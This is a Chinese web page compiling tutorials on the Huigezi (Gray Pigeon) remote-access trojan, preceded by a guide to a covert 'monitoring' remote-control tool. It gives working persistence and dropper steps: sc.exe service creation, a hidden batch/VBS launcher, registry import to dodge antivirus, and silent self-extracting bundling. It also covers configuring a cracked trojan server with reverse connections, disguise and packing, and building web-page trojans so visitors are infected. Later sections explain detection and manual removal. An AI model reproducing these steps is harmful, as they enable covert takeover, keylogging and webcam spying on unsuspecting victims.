当前位置:文档之家› 灰鸽子破解版教程

灰鸽子破解版教程

灰鸽子破解版教程
灰鸽子破解版教程

灰鸽子破解版教程

(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)

第一部份:网络人远程监控软件

网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。

Netman监控版详细安装方法:

1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。

2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。

3.完成以上操作后,再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。

4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。

5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。

出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码,可点击“选项”-“修改密码”。

6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。想要再次操作软件,请按下ctrl+y键。

右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。

7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。

https://www.doczj.com/doc/b814869735.html,man监控版“连接”按扭左侧有一个“中转”选项,是通过网络人的服务器中转

优化连接速度。通常不建议选择“中转”,因为连接速度正常时,选上反而会使得速度变慢。在没选择的情况下,软件会根据网络状况,自行判断是否通过服务器中转。软件还有许多设置选项,在不了解功能的情况下,不要随意修改。

第二部份:

灰鸽子教程

准备工具:

鸽子服务端

IcoSprite图标更改器;

SC.exe服务添加删除更改工具;

winrar

程序特点:

自解压形式,双击即可

制作过程:

1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。其他的随你个人爱好。

2.用SC创建一个服务

运行CMD.EXE 在system32的目录下运行执行

SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"

‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。

sc.exe descript_ion huigezi "不死鸽子"

‘这句是将huigezi服务的描述改为“不死鸽子”

sc config wuauserv depend= huigezi

‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。

这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。

3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg

4.创建一个BA T文件,并命名为update.bat

@regedit /s %systemroot%\system32\1.reg

@%systemroot%\system32\gezi.exe

@del /q /f /s %systemroot%\system32\1.reg

@del /q /f /s %systemroot%\system32\Update.vbs

@del /q /f /s %systemroot%\system32\Update.bat

5.创建一个vbs并命名为update.vbs

目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。

里面写上如下代码:

On Error Resume Next

set wshshell=createobject ("wscript_.shell")

a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)

6.用我门配置出来的服务端,并命名为run.exe,用run.exe做一个自解压文件,并命名为gezi.exe.。

记得将解压模式为全部隐藏.解压后运行run.exe,当然你的服务端要自己做免杀,这里我就不多说了。八仙过海....

7.将gezi.exe 1.reg Update.vbs Update.bat 再用winrar制作一个自解压文件,解压到%systemroot%\system32\ 解压后运行Update.vbs

当然解压模式依旧全部隐藏,替换同名文件

现在用rar捆绑出来的文件很多杀软都不杀,你也可以用系统自带的捆绑机,或其他的捆绑机

这个方法可以用到其他的木马中

捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开"

灰鸽子第一章:软件相关介绍:

灰鸽子[VIP 专业版]

1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!

2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!

3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。

4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜索符合条件主机的功能:

a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏!

b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了!

5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.

6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!

7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。

8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,

9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。

10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持Windows9x/ME/2000/Xp/2003。

11.软件附带有四款实用工具:

a. EXE工具: 可以修改任何EXE文件图标,支持真彩色!

b. 内网端口映射器: 它允许你将局域网内的服务映射到internet上,使你在局域网内部也能使用自动上线功能!

c. FTP服务器: 可以开本机FTP服务!

d. Web服务器: 可以建立一个简单的Web服务器!

12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以录制为Mpeg-1文件格式.

13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切!

功能简单介绍:

【1】对远程计算机文件管理:模枋Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。

【2】远程控制命令:查看远程系统信息、剪切板查看、进程管理、服务管理、共享管理!

【3】捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作送到远程实现实时控制功能!

【4】视频语音,可以监控远程摄像头,还有语音监听和发送功能,可以和远程主机进行语音对话!

【5】telnet(超级终端).

【6】注册表模拟器:远程注册表操作就像操作本地注册表一样方便!

【7】命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页,

筛选符合条件的机等,点一个按钮就可以让N台机器同时关机或进行其它操作!

【8】服务端以服务方式启动,支持发送多种组合键,可以轻松管理远程服务器!

【9】专用的自动上线系统,直接使用灰鸽子注册ID即可实现远程服务端自动上线!

【10】多种自动上线方式:专用上线、DNS解析域名、固定IP等,用户自由选择!

注册灰鸽子软件后享有:

⒈享用软件的所有功能,没有任何限制!

⒉能使用对应的灰鸽子注册版本,能得到此版后期修正的正式版本!

⒊可以使用我们的专用上线系统,无需其它域名和空间支持!

⒋得到我们更好的技术服务!

注:[VIP版] 包括VIP2005、Version 1.2、Version 2.0 !

[企业版]用户只能使用企业版!不能使用其它版本!

5.加入会员后,会自动加入官方论坛。享受官方技术支持

灰鸽子第二章:好马配好鞍,服务端正确配置。

灰鸽子是一款要交钱的软件,也就是说,你使用VIP版的话是要交给作者每年几十块钱的使用费(不作任何评论)因此网上也就有很多高手破解灰鸽子,让灰鸽子可以不用到灰鸽子的官方网站进行验证,从而可以不用交钱就可以使用,相关版本有:影子鹰破解专用版,爱儿破解版,以及华夏黑客联盟的灰鸽子sunray破解版。

今天我们就用"灰鸽子sunray破解版"来向大家详细解析这款木马的服务端配置方式,只可实验,不可做坏事,大家不喜欢请跳过这一章。

第一节:未雨绸缪,实验准备。

第一,关闭杀毒软件,这点不用我说了吧~~~因为是木马,下载了之后如果杀毒软件监控开着的话肯定会被删除的。

第二,当然是下载灰鸽子的软件啦~~~上网找,有很多~~~

第三,申请一个免费的主页空间,为什么要呢?因为灰鸽子是可以反弹式链接的,也就是说,服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。(这一点,等一下会详细解说)

第二节:实战开始。

把我们刚才下来的文件解压到某个文件夹,记住,不要改文件夹的名字,后面会用到。

解压的文件里面有以下几个文件:

H_Client.exe 这个是客户端的主要文件,可以配置文件,生成服务端,可以远程控制客户端。

http.exe 这个是本地http服务器,因为我们的灰鸽子是破解版的,通常正式版的灰鸽子会到官方的服务器上去验证你的软件是否正版,所以这个软件就是用来在本机子上建一个服务器,骗过软件的,从而达到破解的目的。

sunray.exe 这个里面其实也就只是一个host,它把https://www.doczj.com/doc/b814869735.html,这个网站的域名本地解析到本机,而不是解析到官方网站。vip_2005_0113.rar 这个是验证的软件,当我们的软件解析到本机的时候它就会

下载这一个到客户端,用来验证用的。

其它的文件还有config2005.asp,Operate.ini 还有四个文件夹,他们分别是(dat images login sound)我也不知道什么用的。应该是配置用的。

第一步:在你的电脑上新建一个ip.txt的文本文件,内容如下:http://huigezi212.126.131.43:8000end其中212.126.131.43这个是我的电脑IP地址,8000是连接的端口,你可以把它写成你自己的IP地址,端口一般不要去改动,然后把这个文件上传到你刚才申请的空间,如果你的电脑是动态IP的话,那你就要经常更新这个文件的内容,然后上传到空间,它的目的是客户端上线的话就会去这个网站读取这个文件,然后主动和你取得连接。

第二步,首先运行sunray.exe,然后运行http.exe 点开始服务!

第三步,运行客户端,也就是H_Client.exe这个文件,

点击“自动上线”选项,有几个要点要说的,

1)“备用自动上线,URL转向域名或网页文件,这里呢,填写你刚才申请到的网站空间地址和ip.txt,比如http://你的网站地址/ip.txt(当然,如果你是固定IP的话呢,可以写你的IP地址,那么前面的申请空间,上传文件几步可以省略)

2)“自动连接密码”,这个是表示你可以连接到的电脑所要用到的密码,如果为空的话,也没什么大不了的,顶多就是别人也可以用你的“肉鸡”

3)“配置说明”建议你把“只使用备用自动上线”前的勾打上,因为我们的软件是破解版的,官方的那个服务器我们是用不了啦~~~

4)“用户名称”“用户密码”这两个地方乱填些数字进去就行了,破解版用不了正式版的服务器的,它是服务器用来验证软件是否“正版”用的。

“安装选项”选项卡,建议修改一下名字,以免被发现,其它的自己看着办,看着喜欢就选吧~~~^_^

“启动项”这个很重要,建议你修改一下名字,它主要是服务端随系统自动启动用的,也是自己看着办。其中的“生成服务”这一项是为了达到隐藏用的,这也是我们经常说的手工清除木马的关键。也是长期以来很多人说无法清除灰鸽子的原因,因为它写成了服务,这

个的优先级是系统级的,所有使用这台电

脑的用户都会启动木马。

“代理服务”,嘻嘻,就是你控制的电脑可以给我们做为一台代理服务器,说不定人家公布出来的代理服~务器地址有一部分是这些电脑的哦~~~

“高级选项”这里主要是用来对付杀毒软件和防火墙用的,默认是插入IEXPLORER,启动隐藏文件隐藏插入的IE进程,以及使用UPX压缩,这里就不用去改它的,默认就行。

"服务器图标”是用来伪装用的,你自己选项自己喜欢的图标吧~~~

配置好了就点击生成服务器,软件会优先从官方验证,但没效,出错了后就从本地服务器验证,这就是我们要本机建http服务器的原因。好了,到此,服务端就生成了,不要运行它,运行了你就会中木马的,(不准做坏事)

软件使用方法:当别人中了你的木马后,它会从你的网站读取ip.txt这个文件,然后主动连接到你的电脑,如果你此时也打开了客户端的话,连接建立成功,你可以控制这台电脑了。具体有什么内容你自己摸索,

如果你是动态IP地址的话,那么你要每次把新的ip.txt上传到网站上去~~~

·没有路由密码权限时的鸽08-23 ·上网安全Vista自我防范10-11

·让濒临崩溃的Windows XP 10-11 ·有备无患,快速自制救急10-11

·要你好看!Windows看图工10-11 ·空间赞助网提供不同类型10-11

·讨论net.exe和net1.exe的10-10 ·让3389远程桌面传输更通10-10

·巧妙入侵渗透赌博站10-10 ·Aspx空间扫权限工具10-10

·Windows2003最新提权工具10-10 ·易淘乐提供100M免费全能10-10

·系统开机密码忘了不着急10-09 ·中意网络提供免费100M免10-09

·与众不同Windows XP开始10-08 ·让桌面图标翻跟斗在XP上10-08

·上海宽元站长资助计划-提10-08 ·个性化Windows XP的任务10-07

·趣盘提供3G免费网络硬盘10-07 ·秀山热线提供200MB免费全10-07

·一次艰辛的提权过程10-06 ·成功入侵IT大卖场的渗透10-06

·mysqlhack- MYSQL利用工10-06 ·lanker一句话PHP后门客户10-06

·WIXI提供3G免费多媒体网10-06 ·新人网络提供100M/ftp免10-06

·如何利用QQ带来高流量10-05 ·UuShare提供免费网络文件10-05

[推荐]灰鸽子超级详细教程(看了就会)热荐★★★★★灰鸽子超级详细教程(看了就会)文章整理发布:黑客风云文章来源:https://www.doczj.com/doc/b814869735.html, 更新时间:2007-1-16 13:12:53

灰鸽子第三章:服务端工作方式:

灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事

,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。

灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。

服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。

下面介绍服务端:

配置出来的服务端文件文件名为G_Server.exe(这是默认的,当然也可以改。

G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件、服务的注册表项,甚至是进程中的模块名。截获的函数主要是用来遍历文件、

遍历注册表项和遍历进程模块的一些函数。所以,有些时候用户感觉种了毒,但仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll 文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此,中毒后,我们看不到病毒文件,也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同,G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有进程中。

灰鸽子的作者对于如何逃过杀毒软件的查杀花了很大力气。由于一些API函数被截获,正常模式下难以遍历到灰鸽子的文件和模块,造成查杀上的困难。要卸载灰鸽子动态库而且保证系统进程不崩溃也很麻烦,因此造成了近期灰鸽子在互联网上泛滥的局面。

灰鸽子第四章:双管齐下,手工和软件清除灰鸽子。

一.灰鸽子的手工检测

由于灰鸽子拦截了API调用,在正常模式下服务端程序文件和它注册的服务项均被隐藏,也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外,灰鸽子服务端的文件名也是可以自定义的,这都给手工检测带来了一定的困难。

但是,通过仔细观察我们发现,对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出,无论自定义的服务器端文件名是什么,一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点,我们可以较为准确手工检测出灰鸽子服务端。

由于正常模式下灰鸽子会隐藏自身,因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是:启动计算机,在系统进入Windows启动画面前,按下F8键(或者

在启动计算机时按住Ctrl键不放),在出现的启动选项菜单中,选择“Safe Mode”或“安全模式”。

1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件。打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”,然后点击“确定”。

2、打开Windows的“搜索文件”,文件名称输入“_hook.dll”,搜索位置选择Windows 的安装目录(默认98/xp为C:\windows,2k/NT为C:\Winnt)。

3、经过搜索,我们在Windows目录(不包含子目录)下发现了一个名为Game_Hook.dll 的文件。

4、根据灰鸽子原理分析我们知道,如果Game_Hook.DLL是灰鸽子的文件,则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录,果然有这两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。

经过这几步操作我们基本就可以确定这些文件是灰鸽子服务端了,下面就可以进行手动清除。

二、灰鸽子的手工清除

经过上面的分析,清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作,主要有两步:1、清除灰鸽子的服务;2删除灰鸽子程序文件。

注意:为防止误操作,清除前一定要做好备份。

(一)、清除灰鸽子的服务

注意清除灰鸽子的服务一定要在注册表里完成,对注册表不熟悉的网友请找熟悉的人帮忙操作,清除灰鸽子的服务一定要先备份注册表,或者到纯DOS下将注册表文件更名,然

后在去注册表删除灰鸽子的服务。因为病毒会和EXE文件进行关联2000/XP系统:

1、打开注册表编辑器(点击“开始”-》“运行”,输入“Regedit.exe”,确定。),打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。

2、点击菜单“编辑”-》“查找”,“查找目标”输入“game.exe”,点击确定,我们就可以找到灰鸽子的服务项(此例为Game_Server,每个人这个服务项名称是不同的)。

3、删除整个Game_Server项。

98/me系统:

在9X下,灰鸽子启动项只有一个,因此清除更为简单。运行注册表编辑器,打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run项,我们立即看到名为Game.exe的一项,将Game.exe项删除即可。

(二)、删除灰鸽子程序文件

删除灰鸽子程序文件非常简单,只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件,然后重新启动计算机。至此,灰鸽子VIP 2005 服务端已经被清除干净。

以上介绍的方法适用于我们看到的大部分灰鸽子木马及其变种,然而仍有极少数变种采用此种方法无法检测和清除。同时,随着灰鸽子新版本的不断推出,作者可能会加入一些新的隐藏方法、防删除手段,手工检测和清除它的难度也会越来越大。

三、防止中灰鸽子病毒需要注意的事项

1. 给系统安装补丁程序。通过Windows Update安装好系统补丁程序(关键更新、安全更新和Service pack),其中MS04-011、MS04-012、MS04-013、MS03-001、MS03-007、MS03-049、MS04-032等都被病毒广泛利用,是非常必要的补丁程序

2. 给系统管理员帐户设置足够复杂足够强壮的密码,最好能是10位以上,字母+数字+其它符号的组合;也可以禁用/删除一些不使用的帐户

3. 经常更新杀毒软件(病毒库),设置允许的可设置为每天定时自动更新。安装并合理

使用网络防火墙软件,网络防火墙在防病毒过程中也可以起到至关重要的作用,能有效地阻挡自来网络的攻击和病毒的入侵。部分盗版Windows用户不能正常安装补丁,这点也比较无奈,这部分用户不妨通过使用网络防火墙来进行

一定防护

4. 关闭一些不需要的服务,条件允许的可关闭没有必要的共享,也包括C$、D$等管理共享。完全单机的用户可直接关闭Server服务。这些都可以用winxp总管等优化软件关闭。

5. 不要随便打开或运行陌生、可疑文件和程序,如邮件中的奇怪附件,外挂程序等。

四、灰鸽子(Huigezi、Gpigeon)专用检测清除工具

软件名称:灰鸽子(Huigezi、Gpigeon)专用检测清除工具

界面语言:简体中文

软件类型:国产软件

运行环境:/Win9X/Me/WinNT/2000/XP/2003

授权方式:免费软件

软件大小:414KB

软件简介:由灰鸽子工作室开发的,针对灰鸽子专用清除器!可以清除VIP2005版灰鸽子服务端程序(包括杀毒软件杀不到的灰鸽子服务端)和灰鸽子[辐射正式版] 和DLL版服务端牵手版服务端运行DelHgzvip2005Server.exe文件清除VIP2005版灰鸽子服务端程序,运行un_hgzserver.exe文件清除灰鸽子[辐射正式版] 和DLL版服务端牵手版服务端

结束语:写完了这篇教程,我也该准备重装系统了,因为我运行了自己生成的木马,体验到了它的强大功能,不想手工去清除了,直接重装算了。

灰鸽子使用方法

灰鸽子使用方法++网页木马生成和制作详解++图片噢!!! 2007-11-28 23:22:31| 分类:技术| 标签:|字号大中小订阅 一、工具:灰鸽子VIP 200 5破解版 服务端配置是最基础的,我大概说下重点.首先点”自动上线”,在”网易免费域名更新IP”处先申请一个免费域名,比如https://www.doczj.com/doc/b814869735.html,,再点”更新IP到域名”,如果一次更新出错就反复多试几次,一般会成功 的 图1 再点”配置服务程序’,这里有几点值得注意: 1.”自动上线”处一定要填正确了,就填我们刚才申请的域名https://www.doczj.com/doc/b814869735.html,,下面的”自动上线连 接密码”可不填,填写是为了安全. 2.关于破解:这也是最关键的地方,在运行鸽子客户端的时候我们先要运行它的破解文件,我们双击hosts.exe,自解压路径不能改变,至于为什么不能变大家想下就会明白了,然后运行http.exe,点”开始服务”(如果你本身的IIS开了的话应该先将其停止).前提步骤做好了,我们打开鸽子.如图2.在配置服务端的用户名和用户密码处随便填写即可.然后点”生成服务端”,到这服务端就生成了,每一步都是关键的,少一步, 服务端可能就不能生成.

二、制作网页木马 工具:专业版网页木马生成器[IFRAME溢出] 南域剑盟网页木马生成器 教主网页木马生成器 潜入者修改免杀版(备用) 光有服务端是不行的,必需要发给对方运行才行,那怎么让对方运行呢?直接将exe文件发给对方吗?基本上是很难成功的,我想最好是通过网页,让对方在浏览网页的时候不知不觉中马.做网页木马之前必需要有一个免费的空间让你放马.网上免费空间很多,大家去申请就是了.假设我们现在已经申请好了,空间地址为:https://www.doczj.com/doc/b814869735.html,/setup.exe.前提具备了.我们开始工作!先使用专业版网页木马生成器.如图 3. 在”木马程序路径”上填写http;//https://www.doczj.com/doc/b814869735.html,/setup.exe”,”生成的网页名1,2” 可以随便填,保持默认即可。下面一栏”对于IE5,IE5.5使用冰狐浪子超级木马”使用之前需要把setup.exe拷贝到chm目录中,在”木马程序名称”处填写setup.exe,在”生成后的chm文件名”处保持默认icyfox.chm即可,在”用于存放上面chm文件的完整地址处填写https://www.doczj.com/doc/b814869735.html,/icyfox.htm,最后单击生成。将生成的

支持灰鸽子上线的FTP免费空间

我的空间为企业和个人用户提供免费自助建站服务,当然免费服务是有不少限制的 FreeW eb免费100M主页空间,号称无限流量、每天备份,web方式上传管理文件,无广告。 我家在线免费https://www.doczj.com/doc/b814869735.html,二级域名,支持转发、IP/别名解析、动态解析;50M免费虚拟主机空间,ftp上传管理文件,支持php,并提供10M的MySQL空间,有广告。 爱迪免费个人主页空间,可以使用他们的模版,也可以自己上传页面,总共仅有10M空间,还提供免费论坛、日记本、相册等免费服务。 久留一会免费ASP空间,1000M容量,但对上传文件限制较严,且文件仅保存1、2个月,无广告。申请有数量限制,每隔一个小时才有N个申请机会,比较麻烦。 4000Web免费4000M主页空间,每月8000M流量限制、每天500M流量限制,ftp、web方式上传管理文件,支持php、mysql,无广告。 赛腾网免费自助建站,150M存储空间,需要下载一个将近167M的软件来使用,但功能确实很强大,无广告。 FSDesigner免费自助建站,只需选择模板进行内容修改设计就能生成漂亮的网 站,直接把页面通过ftp传送到你的空间,很方便,支持中文。 9999mb为您提供10G免费主页空间,每月100G流量限制,可以绑定顶级域名,还有流量统计功能,ftp、web方式上传管理文件,支持php、mysql,有广告。 RedRival免费2M主页空间,ftp方式上传管理文件,支持php5,有广告。中国学生网为您提供50M免费主页空间,ftp方式上传管理文件,单个文件不超过3M,无广告。 YFWebSpace为您提供400M免费主页空间,无限流量,ftp、web方式上传管理文件,无广告。 IGotFree 为您提供无限容量免费主页空间,并且不限制流量,web方式上传管理文件,支持php、mysql,速度比较慢,无广告。 MyJavaS erver为您提供5M免费主页空间,ftp方式上传管理文件,支持JSP应用,主要是面向JSP编程爱好者提供空间,申请的时候要完成一道题目才行。

IPS测试方案

IPS测试方案1测试说明 1.测试时间: 2.测试人员: 3.参测产品型号: 2测试内容 测试时网络拓扑图: 2.1 DDOS攻击测试 ●针对SYN Flood攻击 攻击工具:HGOD 描述:测试IPS是否检测和阻断攻击 测试结果描述:攻击报文数量-阻断攻击报文的数量●针对UDP Flood攻击 攻击工具:阿拉丁UDP洪水攻击 描述:测试IPS是否检测和阻断攻击 测试结果描述:攻击报文数量-阻断攻击报文的数量●针对ICMP Flood攻击 攻击工具:HGOD 测试结果描述:攻击报文数量-阻断攻击报文的数量●针对IGMP Flood攻击 攻击工具:HGOD

测试结果描述:攻击报文数量-阻断攻击报文的数量 测试结果统计: 测试项名称DDOS攻击测试测试项编号IPS-Test-1 测试项描述拒绝服务攻击测试测试目的检测IPS系统对SYN_Flood、 UDP_Flood、ICMP、IGMP拒绝服 务攻击的防护效果 测试产品型号结果说明测试时间测试工程师 有效防护TCP Flood攻击,并且没有阻断正常的网络 访问HGOD分别使用不同线程、不同封包大小进行攻击 可以有效防护UDP flood 攻击阿拉丁UDP洪水软件使用超强最高级别,不同的封包大小进行攻击 可以有效防护ICMP flood 攻击,并且没有阻断正常的ping数据包,HGOD分别使用不同线程、不同封包大小进行攻击 可以有效防护IGMP flood 攻击HGOD分别使用不同线程、不同封包大小进行攻击 2.2 扫描软件测试 ●针对Super Scan扫描测试 攻击工具:Super Scan 描述:测试IPS是否检测和阻断攻击 测试结果描述:在SecIPS3600保护下可有效防止Super Scan 扫描●针对X Scan扫描测试 攻击工具:X scan 扫描测试 描述:测试IPS是否检测和阻断攻击 测试结果描述:在SecIPS3600保护下可有效防止X Scan 扫描 测试结果统计:

灰鸽子原理及上线方法剖析

原创作者unis 远程控制分类与远程协助区别 远程控制技术是黑客必学的技术之一。远程控制不同于远程协助,两者之间有很大的区别,所谓远程协助需要经过被控端的授权允许,并且被控端可以看到控制者的所有操作,使之控制操作透明性;例如我们的QQ远程协助,就需要对方的允许控制进行操作,并且对方也能够看到我们的操作动作,远程协助一般是用来进行远程的计算机操作协助。远程控制则不一样,远程控制只要在被控者电脑安装一个服务端,即可在不知情的情况下进行控制对方计算机以及对计算机其它操作,控制时不需要经过对方的许可就可以控制,而控制时操作的一些动作,对方也无法察觉到(除鼠标控制)。远程控制按控制类型可以分类为:(1)正向主动型远程控制(2)反向被动型。什么是正向主动型的呢?正向主动型是需要控制着主动去连接被控端,一般情况下,控制者必须知道需要被控制者的IP和端口,然后通过某种软件来进行控制被控者,例如微软的3389远程桌面、Radmin远程控制、VNC远程控制都需要知道对方的IP(端口)然后通过客户端软件进行连接对方。反向被动型控制又可以称为反弹性控制技术,指的是在被控端下安装服务端之后,由被控端主动来寻找你的客户端监听端口软件连接来进行控制,这个好处就是不需要知道对方的IP地址和端口,被控端会自己主动来找我们的监听地址和端口,当我们发现被控端已经找到我们的监听地址和端口,我们就可以控制对方电脑,这样省去要知道对方的IP和端口的麻烦了,特别是对方是动态IP 的时候。反向被动型远控在黑客界已经是主流了,黑客专门使用某些控制软件在控制对方,反弹型远控软件更是数不胜数,例如:花鸽子(灰鸽子)、白金、终结者、Ghost 等等。 远程控制软件的功能与远控木马的特性 我们这里主要讲解的是反弹型远控,并且也有讲解到Web型的正向型远控,正向型远控还有Radmin、3389远程桌面也可以值得大家去学习,关于Radmin远控的可以参考我之前写的《深度研究Radmin远控》。关于3389终端技术我已经写了《精通3389终端》。现在的远程控制软件(又称客户端,生成出的木马叫服务端)数不胜数,甚至很多已经是源码爆出,对于各种远程控制软件来说,其实基本都是具备以下功能: 【屏幕监控】:可以查看被控制者的屏幕,保存捕获的被控制屏幕的截图。并且看到对方的一切操作,可以自由选定图像位色查看,还 可以选择是否控制对方鼠标、键盘,若选择即可控制对方的电脑鼠标、键盘,这一控制对方是可以看到鼠标被控制。 【文件管理】:可以在后台查看被控者的各个磁盘中的文件,直接显示隐藏文件,可自由在对方的磁盘中删除文件、上传文件、下载文 件、重命名文件、远程显示打开文件、远程

灰鸽子使用教程图解

